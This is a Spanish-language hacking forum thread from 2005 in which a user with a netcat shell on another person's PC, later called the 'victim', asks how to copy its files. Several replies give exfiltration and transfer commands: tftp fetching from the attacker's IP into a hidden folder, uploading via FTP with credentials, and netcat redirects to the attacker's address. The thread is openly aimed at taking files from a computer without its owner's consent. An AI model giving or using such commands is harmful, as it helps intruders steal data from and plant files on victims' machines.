Svaka
|
Buenas, he hecho lo del netcat y veo los archivos del otro pc. Como puedo bajarmelos a mi pc? se usa un comando no?
Sé que la pregunta es un tanto estupida, pero no me acuerdo de ningun comando que lo hiciese y no he encontrado nada por inet....
Veo los archivos por la ventana de msdos (lo digo por si hay alguna otra forma o algo de eso)
Saludos
|
|
|
|
|
|
|
|
|
|
Rey11
|
El comando es tftp y necesitas tener un servidor tftp en tu pc.
|
|
|
|
|
|
|
|
|
hierosgammos
ĦįěяФѕģăМФ§
|
UTILIZA UNA datapipe, una tuberia pues
|
|
|
|
|
|
 "Si dispusiera de 6 horas para talar un árbol, me pasaria las 4 primeras afilando el hacha" -Abraham Lincoln
|
|
|
Morris
Ex-CoAdmin y
Ex-Staff
|
Creo que lo más fácil es que los subas a un FTP  Usa esto: c:\ftp www.dominio.com user pwd put archivos.zip 
|
|
|
|
« Última modificación: 22 Junio 2005, 02:15 por Morris »
|
|
|
|
|
pepel
Uno más
|
y con el propio netcat tb se puede
en tu lado pones el netcat en escucha en el puerto que quieras redirigiendo a un archivo (nc [parametros que sean] > archivo)
y en el otro lado inicias la conexion de netcat [parametros que sean] < archivo_que_quieras_enviar
Es un metodo cutre, pero efectivo. saludos,
pepel
|
|
|
|
|
|
Para algunos, la vida es galopar un camino empedrado de horas, minutos y segundos. Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo, me transporte mecido hasta el siguiente.
|
|
|
Svaka
|
ok, entonces se supone que: 1. creo lo de ftp 2. y cuando este en netcat escribir "copyall c:\ftp www.dominio.com user pwd" ?? es lo que he entendido :S es eso? como creo un servidor ftp en mi pc? (en seguida busko un poco mas) saludos y muxas gracias
|
|
|
|
|
|
|
|
|
lirkuid
|
Ejecuta en tu maquina un servidor tftp, un ejemplo de servidor tftp es el tftpd32 crea una carpeta llamada por ejemplo tftp y mete ahi el servidor y el archivo a subir, configuralo a tu gusto y como todos los windows traen por defecto un cliente tftp en la carpete system32 pues con este comando
tftp.exe -i xxx.xxx.xxx.xxx get archivoasubir.extension c:\colocalodondekieras\mientras\mas\escondido\mejor
Eso todo seguido, donde las x colocas tu ip Que me corrijan se m ekivoko
Saludos
|
|
|
|
« Última modificación: 24 Junio 2005, 00:55 por lirkuid »
|
|
|
|
|
Jec
Not-Public
|
tan simple como... nc TUIP < archivo.extension puerto un saludo
|
|
|
|
|
|
Conthackto.com.mx
|
|
|
Svaka
|
 entonces con escribir en la consola que esta el netcat "nc TUIP < archivo.extension puerto" se supone que me bajo el archivo a mi pc? a que carpeta? Gracias por las respuestas
|
|
|
|
|
|
|
|
|
Jec
Not-Public
|
si, se baja ala carpeta donde tienes el nc
|
|
|
|
|
|
Conthackto.com.mx
|
|
|
Svaka
|
pues de pu** madre tio, voy a probarlo! lo de:
"tftp.exe -i xxx.xxx.xxx.xxx get archivoasubir.extension c:\colocalodondekieras\mientras\mas\escondido\mejor"
tambien debe de funcionar bien.
MUCHAS GRACIAS GENTE
|
|
|
|
|
|
|
|
|
Svaka
|
no me a funcionado ninguna de las 2 opciones :'(
Con lo del comando tftp lo pongo todo bien pulso intro y me dice "tiempo de espera agotado"
y con lo de "nc TUIP < archivo.extension puerto" se supone k funciona, pero en realidad no me bajo el archivo...
que puedo hacer?
|
|
|
|
|
|
|
|
|
Nosferatu
Euskadi, bat eta askea!
|
Tambien tienes la alternativa de instalar un servidor FTP, y usar el ftp de win32
un saludo
|
|
|
|
|
|
Triste zaudenean, triste zaudenean, pentsa esazu, zure lagun onenean
|
|
|
Svaka
|
Puedes decirme como crear un ftp y como aplicarlo luego en el netcat?? seria de gran ayuda.
Saludos
|
|
|
|
|
|
|
|
|
Svaka
|
Buenas, me estoy volviendo loco con este tema  Habeis conseguido pillar archivos de vuestra victima? Que programa y comando utilizasteis? help pleasee!!  Saludos
|
|
|
|
|
|
|
|
|
|